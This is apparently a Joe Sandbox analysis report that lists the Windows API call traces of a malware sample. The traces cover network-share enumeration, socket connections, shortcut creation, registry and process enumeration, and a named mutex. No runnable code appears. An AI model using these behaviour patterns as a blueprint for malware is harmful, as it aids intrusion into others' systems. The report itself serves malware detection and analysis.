                                                                                                                                                                                                                                                                                            • Sleep.KERNEL32(00000400), ref: 014419FA
                                                                                                                                                                                                                                                                                            • WNetOpenEnumA.MPR(00000002,00000000,00000000,01449078,?), ref: 01441A11
                                                                                                                                                                                                                                                                                            • GlobalAlloc.KERNEL32(00000040,00007F80), ref: 01441A51
                                                                                                                                                                                                                                                                                            • WNetEnumResourceA.MPR(?,?,?,?), ref: 01441A92
                                                                                                                                                                                                                                                                                            • lstrcpy.KERNEL32(?,00000000), ref: 01441B29
                                                                                                                                                                                                                                                                                            • lstrcat.KERNEL32(?,01433D50), ref: 01441B38
                                                                                                                                                                                                                                                                                            • lstrcpy.KERNEL32(?,?), ref: 01441B76
                                                                                                                                                                                                                                                                                            • lstrlen.KERNEL32(?), ref: 01441B83
                                                                                                                                                                                                                                                                                            • lstrcat.KERNEL32(?,01433D54), ref: 01441BA2
                                                                                                                                                                                                                                                                                            • lstrlen.KERNEL32(?), ref: 01441BAF
                                                                                                                                                                                                                                                                                            • lstrcat.KERNEL32(?,.tmp), ref: 01441BD1
                                                                                                                                                                                                                                                                                            Strings
                                                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                                                            • Source File: 00000001.00000002.1712829927.0000000001430000.00000040.00001000.00020000.00000000.sdmp, Offset: 01410000, based on PE: true
                                                                                                                                                                                                                                                                                            • Associated: 00000001.00000002.1712829927.0000000001410000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                            • Associated: 00000001.00000002.1712829927.00000000014B7000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                            • Associated: 00000001.00000002.1712829927.00000000014BA000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                            • Associated: 00000001.00000002.1712829927.00000000014BD000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                            • Associated: 00000001.00000002.1712829927.00000000014C5000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                            • Snapshot File: hcaresult_1_2_1410000_SecuriteInfo.jbxd
                                                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                                                            • API ID: lstrcat$Enumlstrcpylstrlen$AllocGlobalOpenResourceSleep
                                                                                                                                                                                                                                                                                            • String ID: .tmp
                                                                                                                                                                                                                                                                                            • API String ID: 2671286937-2986845003
                                                                                                                                                                                                                                                                                            • Opcode ID: 0604ae45522b893ab0437f801cba0466dd7a8a78253c8c983c24ffdb658dbd4f
                                                                                                                                                                                                                                                                                            • Instruction ID: f75d153559b240a1194794761ec9f76c051d863d6d6a5a6c731afbef4da3c329
                                                                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 0604ae45522b893ab0437f801cba0466dd7a8a78253c8c983c24ffdb658dbd4f
                                                                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 4B91B671900618DFEB20CF64DD48BEBBB75BB48706F008199E619A7290D775AA85CF50
                                                                                                                                                                                                                                                                                            Function 01439706 Relevance: 25.7, APIs: 17, Instructions: 245librarystringmemoryCOMMON
                                                                                                                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                                                                            • GetSystemDirectoryA.KERNEL32(00000000,000000F8), ref: 0143976E
                                                                                                                                                                                                                                                                                            • lstrlen.KERNEL32(00000000), ref: 0143977B
                                                                                                                                                                                                                                                                                            • lstrcat.KERNEL32(00000000,01433C94), ref: 0143979A
                                                                                                                                                                                                                                                                                            • GlobalAlloc.KERNEL32(00000040,?), ref: 014397CD
                                                                                                                                                                                                                                                                                            • lstrcat.KERNEL32(00000000,?), ref: 0143983B
                                                                                                                                                                                                                                                                                              • Part of subcall function 0143A75A: GetTempPathA.KERNEL32(00000080,?,?), ref: 0143A78C
                                                                                                                                                                                                                                                                                              • Part of subcall function 0143A75A: lstrlen.KERNEL32(?), ref: 0143A796
                                                                                                                                                                                                                                                                                              • Part of subcall function 0143A75A: lstrcat.KERNEL32(?,01433CC0), ref: 0143A7B2
                                                                                                                                                                                                                                                                                              • Part of subcall function 0143A75A: lstrcpy.KERNEL32(?,00000000), ref: 0143A7CF
                                                                                                                                                                                                                                                                                              • Part of subcall function 0143A75A: lstrlen.KERNEL32(?,01432880,?), ref: 0143A7FD
                                                                                                                                                                                                                                                                                              • Part of subcall function 0143A75A: wsprintfA.USER32 ref: 0143A809
                                                                                                                                                                                                                                                                                            • CopyFileA.KERNEL32(00000000,00000000,00000000), ref: 01439860
                                                                                                                                                                                                                                                                                            • LoadLibraryExA.KERNEL32(00000000,00000000,00000001), ref: 01439875
                                                                                                                                                                                                                                                                                            • LoadLibraryExA.KERNEL32(?,00000000,00000001), ref: 01439895
                                                                                                                                                                                                                                                                                            • GlobalFree.KERNEL32(?), ref: 014398B8
                                                                                                                                                                                                                                                                                            • GetProcAddress.KERNEL32(00000000,01432294), ref: 014398CB
                                                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                                                            • Source File: 00000001.00000002.1712829927.0000000001430000.00000040.00001000.00020000.00000000.sdmp, Offset: 01410000, based on PE: true
                                                                                                                                                                                                                                                                                            • Associated: 00000001.00000002.1712829927.0000000001410000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                            • Associated: 00000001.00000002.1712829927.00000000014B7000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                            • Associated: 00000001.00000002.1712829927.00000000014BA000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                            • Associated: 00000001.00000002.1712829927.00000000014BD000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                            • Associated: 00000001.00000002.1712829927.00000000014C5000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                            • Snapshot File: hcaresult_1_2_1410000_SecuriteInfo.jbxd
                                                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                                                            • API ID: lstrcatlstrlen$GlobalLibraryLoad$AddressAllocCopyDirectoryFileFreePathProcSystemTemplstrcpywsprintf
                                                                                                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                                                                                                            • API String ID: 1023114332-0
                                                                                                                                                                                                                                                                                            • Opcode ID: 2b31e85d5e832cb62a7317c4c682dd39231d259849c53f7a54e0dad9e44acbb0
                                                                                                                                                                                                                                                                                            • Instruction ID: 6463437b80a42022c3c598d297ed94aea941b1d589fc6a5f3a83b3e1a882a5aa
                                                                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 2b31e85d5e832cb62a7317c4c682dd39231d259849c53f7a54e0dad9e44acbb0
                                                                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 41B14C75900219EFDB24DF64DC88BEEB7B5EB8C704F1086D9E60AA7250D774AA81CF50
                                                                                                                                                                                                                                                                                            Function 01437C4E Relevance: 22.9, APIs: 10, Strings: 3, Instructions: 161networksleepCOMMON
                                                                                                                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                                                                            • socket.WS2_32(00000002,00000001,00000006), ref: 01437C83
                                                                                                                                                                                                                                                                                            • ioctlsocket.WS2_32(000000FF,8004667E,00000001), ref: 01437CD8
                                                                                                                                                                                                                                                                                            • connect.WS2_32(000000FF,00000002,00000010), ref: 01437CEB
                                                                                                                                                                                                                                                                                            • WSAGetLastError.WS2_32 ref: 01437D05
                                                                                                                                                                                                                                                                                            • Sleep.KERNEL32(00000032), ref: 01437D1F
                                                                                                                                                                                                                                                                                            • select.WS2_32(000000FE,00000000,00000000,00000000,00000000), ref: 01437E79
                                                                                                                                                                                                                                                                                            • ioctlsocket.WS2_32(000000FF,8004667E,00000000), ref: 01437EE6
                                                                                                                                                                                                                                                                                            • closesocket.WS2_32(000000FF), ref: 01437EFB
                                                                                                                                                                                                                                                                                            Strings
                                                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                                                            • Source File: 00000001.00000002.1712829927.0000000001430000.00000040.00001000.00020000.00000000.sdmp, Offset: 01410000, based on PE: true
                                                                                                                                                                                                                                                                                            • Associated: 00000001.00000002.1712829927.0000000001410000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                            • Associated: 00000001.00000002.1712829927.00000000014B7000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                            • Associated: 00000001.00000002.1712829927.00000000014BA000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                            • Associated: 00000001.00000002.1712829927.00000000014BD000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                            • Associated: 00000001.00000002.1712829927.00000000014C5000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                            • Snapshot File: hcaresult_1_2_1410000_SecuriteInfo.jbxd
                                                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                                                            • API ID: ioctlsocket$ErrorLastSleepclosesocketconnectselectsocket
                                                                                                                                                                                                                                                                                            • String ID: 3'$@$@
                                                                                                                                                                                                                                                                                            • API String ID: 3016611618-2553492011
                                                                                                                                                                                                                                                                                            • Opcode ID: 04b4aadc635263e3c9292c8970777265f505914f752af465388d59bf6591ed28
                                                                                                                                                                                                                                                                                            • Instruction ID: d78931df6ebd65b950e24a6bacf0695d41d255733bd248560253f244a5cb02fc
                                                                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 04b4aadc635263e3c9292c8970777265f505914f752af465388d59bf6591ed28
                                                                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: CA715CB590422CCBDB34CF54CC98BE9B771BBA8316F1085DAD58AA62A1C7B45EC1CF50
                                                                                                                                                                                                                                                                                            Function 014BD9C0 Relevance: 21.1, APIs: 7, Strings: 5, Instructions: 52librarysleeploaderCOMMON
                                                                                                                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                                                                            • GetModuleFileNameA.KERNEL32(00000000,014BEED8,000001FE), ref: 014BD935
                                                                                                                                                                                                                                                                                            • LoadLibraryExA.KERNELBASE(SHELL32.DLL,00000000,00000000), ref: 014BD954
                                                                                                                                                                                                                                                                                            • GetProcAddress.KERNELBASE(00000000,ShellExecuteA), ref: 014BD962
                                                                                                                                                                                                                                                                                            • CreateMutexA.KERNEL32(00000000,00000000,Ap1mutx7), ref: 014BD98F
                                                                                                                                                                                                                                                                                            • GetLastError.KERNEL32(00000000), ref: 014BD996
                                                                                                                                                                                                                                                                                            • Sleep.KERNEL32(000927C0), ref: 014BD9A5
                                                                                                                                                                                                                                                                                            • ExitProcess.KERNEL32(00000000), ref: 014BD9AD
                                                                                                                                                                                                                                                                                            Strings
                                                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                                                            • Source File: 00000001.00000002.1712829927.00000000014BD000.00000040.00001000.00020000.00000000.sdmp, Offset: 01410000, based on PE: true
                                                                                                                                                                                                                                                                                            • Associated: 00000001.00000002.1712829927.0000000001410000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                            • Associated: 00000001.00000002.1712829927.0000000001430000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                            • Associated: 00000001.00000002.1712829927.00000000014B7000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                            • Associated: 00000001.00000002.1712829927.00000000014BA000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                            • Associated: 00000001.00000002.1712829927.00000000014C5000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                            • Snapshot File: hcaresult_1_2_1410000_SecuriteInfo.jbxd
                                                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                                                            • API ID: AddressCreateErrorExitFileLastLibraryLoadModuleMutexNameProcProcessSleep
                                                                                                                                                                                                                                                                                            • String ID: Ap1mutx7$SHELL32.DLL$ShellExecuteA$X@$open
                                                                                                                                                                                                                                                                                            • API String ID: 1721171764-1075979870
                                                                                                                                                                                                                                                                                            • Opcode ID: 4be88916d7375141c92d462fa2e6be302d55da5f01b1b4ee245b71dc4840805a
                                                                                                                                                                                                                                                                                            • Instruction ID: eb1be904034a8b5bd146c4c6f7d2c5aa3aa51c2eab7ccf8e86b8ac21e0446a9d
                                                                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 4be88916d7375141c92d462fa2e6be302d55da5f01b1b4ee245b71dc4840805a
                                                                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 2811CC71644289ABFF50DEE48D49FDA36A99F84B05F440415FA09EE1E0DAB19204877B
                                                                                                                                                                                                                                                                                            Function 01440E71 Relevance: 19.4, APIs: 10, Strings: 1, Instructions: 128stringfileCOMMON
                                                                                                                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                                                                            • lstrcpy.KERNEL32(00000000,?), ref: 01440EF4
                                                                                                                                                                                                                                                                                            • lstrlen.KERNEL32(00000000), ref: 01440F21
                                                                                                                                                                                                                                                                                            • lstrcat.KERNEL32(?,.lnk), ref: 01440F43
                                                                                                                                                                                                                                                                                            • lstrcat.KERNEL32(00000000), ref: 01440F70
                                                                                                                                                                                                                                                                                            • MultiByteToWideChar.KERNEL32(00000000,00000000,000000FF,000000FF,?,00000104), ref: 01440F8C
                                                                                                                                                                                                                                                                                            • CreateFileA.KERNEL32(?,40000000,00000002,00000000,00000002,00000020,00000000), ref: 01440FA8
                                                                                                                                                                                                                                                                                            • lstrlenW.KERNEL32(?), ref: 01440FC8
                                                                                                                                                                                                                                                                                            • lstrlenW.KERNEL32(?), ref: 01440FFB
                                                                                                                                                                                                                                                                                            • WriteFile.KERNEL32(?,?,?,?,00000000), ref: 0144103B
                                                                                                                                                                                                                                                                                            • CloseHandle.KERNEL32(?), ref: 01441048
                                                                                                                                                                                                                                                                                              • Part of subcall function 014344CB: InterlockedExchange.KERNEL32(014490C0,?), ref: 014344E9
                                                                                                                                                                                                                                                                                            Strings
                                                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                                                            • Source File: 00000001.00000002.1712829927.0000000001430000.00000040.00001000.00020000.00000000.sdmp, Offset: 01410000, based on PE: true
                                                                                                                                                                                                                                                                                            • Associated: 00000001.00000002.1712829927.0000000001410000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                            • Associated: 00000001.00000002.1712829927.00000000014B7000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                            • Associated: 00000001.00000002.1712829927.00000000014BA000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                            • Associated: 00000001.00000002.1712829927.00000000014BD000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                            • Associated: 00000001.00000002.1712829927.00000000014C5000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                            • Snapshot File: hcaresult_1_2_1410000_SecuriteInfo.jbxd
                                                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                                                            • API ID: lstrlen$Filelstrcat$ByteCharCloseCreateExchangeHandleInterlockedMultiWideWritelstrcpy
                                                                                                                                                                                                                                                                                            • String ID: .lnk
                                                                                                                                                                                                                                                                                            • API String ID: 2963584520-24824748
                                                                                                                                                                                                                                                                                            • Opcode ID: c399197fb8004dc89c33ffaa705eb710e2e9ca0b8cf6d61c4718f5f38ed58ed7
                                                                                                                                                                                                                                                                                            • Instruction ID: 9cf571814caa8e77ac60b26982cbe10ee8470b8d2f207cd03a20fd700cb15ebd
                                                                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: c399197fb8004dc89c33ffaa705eb710e2e9ca0b8cf6d61c4718f5f38ed58ed7
                                                                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 2941C6B6900218ABDB20DB64CC45BEAB7B9FB5C701F0486E9F309A61D0DB745B89CF50
                                                                                                                                                                                                                                                                                            Function 01441AB1 Relevance: 19.4, APIs: 10, Strings: 1, Instructions: 116stringsleepfileCOMMON
                                                                                                                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                                                                            • WNetEnumResourceA.MPR(?,?,?,?), ref: 01441A92
                                                                                                                                                                                                                                                                                            • lstrcpy.KERNEL32(?,00000000), ref: 01441B29
                                                                                                                                                                                                                                                                                            • lstrcat.KERNEL32(?,01433D50), ref: 01441B38
                                                                                                                                                                                                                                                                                            • lstrcpy.KERNEL32(?,?), ref: 01441B76
                                                                                                                                                                                                                                                                                            • lstrlen.KERNEL32(?), ref: 01441B83
                                                                                                                                                                                                                                                                                            • lstrcat.KERNEL32(?,01433D54), ref: 01441BA2
                                                                                                                                                                                                                                                                                            • lstrlen.KERNEL32(?), ref: 01441BAF
                                                                                                                                                                                                                                                                                            • lstrcat.KERNEL32(?,.tmp), ref: 01441BD1
                                                                                                                                                                                                                                                                                            • lstrlen.KERNEL32(?,?,00000001,?,?,00000000), ref: 01441C2C
                                                                                                                                                                                                                                                                                              • Part of subcall function 01441060: Sleep.KERNEL32(?,?), ref: 014410BF
                                                                                                                                                                                                                                                                                              • Part of subcall function 01441060: lstrcat.KERNEL32(?,01433D20), ref: 014410DD
                                                                                                                                                                                                                                                                                            • DeleteFileA.KERNEL32(?), ref: 01441C4B
                                                                                                                                                                                                                                                                                            • Sleep.KERNEL32(00001000), ref: 01441C71
                                                                                                                                                                                                                                                                                            • Sleep.KERNEL32(00002000), ref: 01441C92
                                                                                                                                                                                                                                                                                            Strings
                                                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                                                            • Source File: 00000001.00000002.1712829927.0000000001430000.00000040.00001000.00020000.00000000.sdmp, Offset: 01410000, based on PE: true
                                                                                                                                                                                                                                                                                            • Associated: 00000001.00000002.1712829927.0000000001410000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                            • Associated: 00000001.00000002.1712829927.00000000014B7000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                            • Associated: 00000001.00000002.1712829927.00000000014BA000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                            • Associated: 00000001.00000002.1712829927.00000000014BD000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                            • Associated: 00000001.00000002.1712829927.00000000014C5000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                            • Snapshot File: hcaresult_1_2_1410000_SecuriteInfo.jbxd
                                                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                                                            • API ID: lstrcat$Sleeplstrlen$lstrcpy$DeleteEnumFileResource
                                                                                                                                                                                                                                                                                            • String ID: .tmp
                                                                                                                                                                                                                                                                                            • API String ID: 3940331287-2986845003
                                                                                                                                                                                                                                                                                            • Opcode ID: e320f1b0b6b39577f59618ee045951f55aa25c3538c53f2575b97fc25592321a
                                                                                                                                                                                                                                                                                            • Instruction ID: 7a43cf8a7ef7bc69ca2e5984ef4f7169bf009aace8cbfe19247a67f6a450f0a9
                                                                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: e320f1b0b6b39577f59618ee045951f55aa25c3538c53f2575b97fc25592321a
                                                                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 6F41E7759006199FEB24CF68CC88FEB7B75AF48B06F40C589E60997264D735EA86CF10
                                                                                                                                                                                                                                                                                            Function 01440CF6 Relevance: 18.1, APIs: 12, Instructions: 115filememoryCOMMON
                                                                                                                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                                                                            • CreateFileA.KERNEL32(00000000,80000000,00000001,00000000,00000003,00000020,00000000), ref: 01440D32
                                                                                                                                                                                                                                                                                            • GetFileSize.KERNEL32(000000FF,00000000), ref: 01440D4B
                                                                                                                                                                                                                                                                                            • GlobalAlloc.KERNEL32(00000040,-00000F68), ref: 01440D6D
                                                                                                                                                                                                                                                                                            • ReadFile.KERNEL32(000000FF,00000000,00000098,00000000,00000000), ref: 01440D88
                                                                                                                                                                                                                                                                                            • CreateFileW.KERNEL32(-0000008E,80000000,00000001,00000000,00000003,00000020,00000000), ref: 01440DCC
                                                                                                                                                                                                                                                                                            • GetFileSize.KERNEL32(000000FF,00000000), ref: 01440DE1
                                                                                                                                                                                                                                                                                            • GlobalAlloc.KERNEL32(00000040,00010170), ref: 01440DFF
                                                                                                                                                                                                                                                                                            • ReadFile.KERNEL32(000000FF,00000000,00011170,00000000,00000000), ref: 01440E1A
                                                                                                                                                                                                                                                                                            • GlobalFree.KERNEL32(00000000), ref: 01440E46
                                                                                                                                                                                                                                                                                            • CloseHandle.KERNEL32(000000FF), ref: 01440E50
                                                                                                                                                                                                                                                                                            • GlobalFree.KERNEL32(00000000), ref: 01440E5A
                                                                                                                                                                                                                                                                                            • CloseHandle.KERNEL32(000000FF), ref: 01440E64
                                                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                                                            • Source File: 00000001.00000002.1712829927.0000000001430000.00000040.00001000.00020000.00000000.sdmp, Offset: 01410000, based on PE: true
                                                                                                                                                                                                                                                                                            • Associated: 00000001.00000002.1712829927.0000000001410000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                            • Associated: 00000001.00000002.1712829927.00000000014B7000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                            • Associated: 00000001.00000002.1712829927.00000000014BA000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                            • Associated: 00000001.00000002.1712829927.00000000014BD000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                            • Associated: 00000001.00000002.1712829927.00000000014C5000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                            • Snapshot File: hcaresult_1_2_1410000_SecuriteInfo.jbxd
                                                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                                                            • API ID: File$Global$AllocCloseCreateFreeHandleReadSize
                                                                                                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                                                                                                            • API String ID: 675253578-0
                                                                                                                                                                                                                                                                                            • Opcode ID: 4c868344a8b40423c539794164330a880d5150a441122ef5b286bc878572fb11
                                                                                                                                                                                                                                                                                            • Instruction ID: 468c8b185334721e1f029585e72f2958f75d78074349d74bc12296fa756c110f
                                                                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 4c868344a8b40423c539794164330a880d5150a441122ef5b286bc878572fb11
                                                                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: B54119B4E00209EBEB20DFE4D889FAFBB74AB48B01F204549F711A7294D7B45650CB50
                                                                                                                                                                                                                                                                                            Function 0144174A Relevance: 15.9, APIs: 8, Strings: 1, Instructions: 132registrysleepstringCOMMON
                                                                                                                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                                                                            • Sleep.KERNEL32(00001000,?,?,?,00000000,01448090,01433FF8,000000FF,?,01443AFC,80000001), ref: 014417D9
                                                                                                                                                                                                                                                                                            • wsprintfA.USER32 ref: 014417F8
                                                                                                                                                                                                                                                                                            • RegOpenKeyExA.ADVAPI32(?,?,00000000,00020019,?), ref: 0144181A
                                                                                                                                                                                                                                                                                            • RegEnumValueA.ADVAPI32(?,00000000,?,000000FF,00000000,00000000,?,000000FF), ref: 01441894
                                                                                                                                                                                                                                                                                            • lstrlen.KERNEL32(?), ref: 014418C4
                                                                                                                                                                                                                                                                                            • lstrlen.KERNEL32(00000000), ref: 014418D0
                                                                                                                                                                                                                                                                                            • Sleep.KERNEL32(00000400), ref: 01441912
                                                                                                                                                                                                                                                                                            • RegCloseKey.ADVAPI32(?), ref: 01441928
                                                                                                                                                                                                                                                                                            Strings
                                                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                                                            • Source File: 00000001.00000002.1712829927.0000000001430000.00000040.00001000.00020000.00000000.sdmp, Offset: 01410000, based on PE: true
                                                                                                                                                                                                                                                                                            • Associated: 00000001.00000002.1712829927.0000000001410000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                            • Associated: 00000001.00000002.1712829927.00000000014B7000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                            • Associated: 00000001.00000002.1712829927.00000000014BA000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                            • Associated: 00000001.00000002.1712829927.00000000014BD000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                            • Associated: 00000001.00000002.1712829927.00000000014C5000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                            • Snapshot File: hcaresult_1_2_1410000_SecuriteInfo.jbxd
                                                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                                                            • API ID: Sleeplstrlen$CloseEnumOpenValuewsprintf
                                                                                                                                                                                                                                                                                            • String ID: %s%s
                                                                                                                                                                                                                                                                                            • API String ID: 1665585142-3252725368
                                                                                                                                                                                                                                                                                            • Opcode ID: cc8fbc8f5475c0c035e840a119f0a60146c5c1af03c4f988f345f6be5f024be8
                                                                                                                                                                                                                                                                                            • Instruction ID: 33ba4fda3c4ff5fa71993c480fee8ad2ccf8129f8695a16521be462b042219fe
                                                                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: cc8fbc8f5475c0c035e840a119f0a60146c5c1af03c4f988f345f6be5f024be8
                                                                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 5E515575D00219AFDB20DFA4DC59BEEB7B4FB4C704F004299E609A7290D7796A85CF50
                                                                                                                                                                                                                                                                                            Function 01439C4F Relevance: 15.1, APIs: 10, Instructions: 147sleepprocessCOMMON
                                                                                                                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                                                                            • CreateToolhelp32Snapshot.KERNEL32(00000002,00000000), ref: 01439C94
                                                                                                                                                                                                                                                                                            • Process32First.KERNEL32(00000000,00000128), ref: 01439CDD
                                                                                                                                                                                                                                                                                            • CharUpperA.USER32(?,00000000,00000128,00000002,00000000), ref: 01439CF1
                                                                                                                                                                                                                                                                                            • Sleep.KERNEL32(00000400), ref: 01439D67
                                                                                                                                                                                                                                                                                            • Sleep.KERNEL32(00000400), ref: 01439DB2
                                                                                                                                                                                                                                                                                            • Process32Next.KERNEL32(00000000,00000128), ref: 01439DC6
                                                                                                                                                                                                                                                                                            • CharUpperA.USER32(?,00000000,00000128,00000000,00000128,00000002,00000000), ref: 01439DDA
                                                                                                                                                                                                                                                                                            • Sleep.KERNEL32(00000400), ref: 01439E25
                                                                                                                                                                                                                                                                                            • Sleep.KERNEL32(00000400), ref: 01439E9D
                                                                                                                                                                                                                                                                                            • CloseHandle.KERNEL32(00000000,00000002,00000000), ref: 01439EB3
                                                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                                                            • Source File: 00000001.00000002.1712829927.0000000001430000.00000040.00001000.00020000.00000000.sdmp, Offset: 01410000, based on PE: true
                                                                                                                                                                                                                                                                                            • Associated: 00000001.00000002.1712829927.0000000001410000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                            • Associated: 00000001.00000002.1712829927.00000000014B7000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                            • Associated: 00000001.00000002.1712829927.00000000014BA000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                            • Associated: 00000001.00000002.1712829927.00000000014BD000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                            • Associated: 00000001.00000002.1712829927.00000000014C5000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                            • Snapshot File: hcaresult_1_2_1410000_SecuriteInfo.jbxd
                                                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                                                            • API ID: Sleep$CharProcess32Upper$CloseCreateFirstHandleNextSnapshotToolhelp32
                                                                                                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                                                                                                            • API String ID: 3272108884-0
                                                                                                                                                                                                                                                                                            • Opcode ID: 7e788f559b8811382ab110f14ca0941f393c956719ee370c9159fd9ed01729e3
                                                                                                                                                                                                                                                                                            • Instruction ID: cc5bdda58f38a93a1e28be0b20ec24d9130a579b0ed3e57ee0295da1038d0f7a
                                                                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 7e788f559b8811382ab110f14ca0941f393c956719ee370c9159fd9ed01729e3
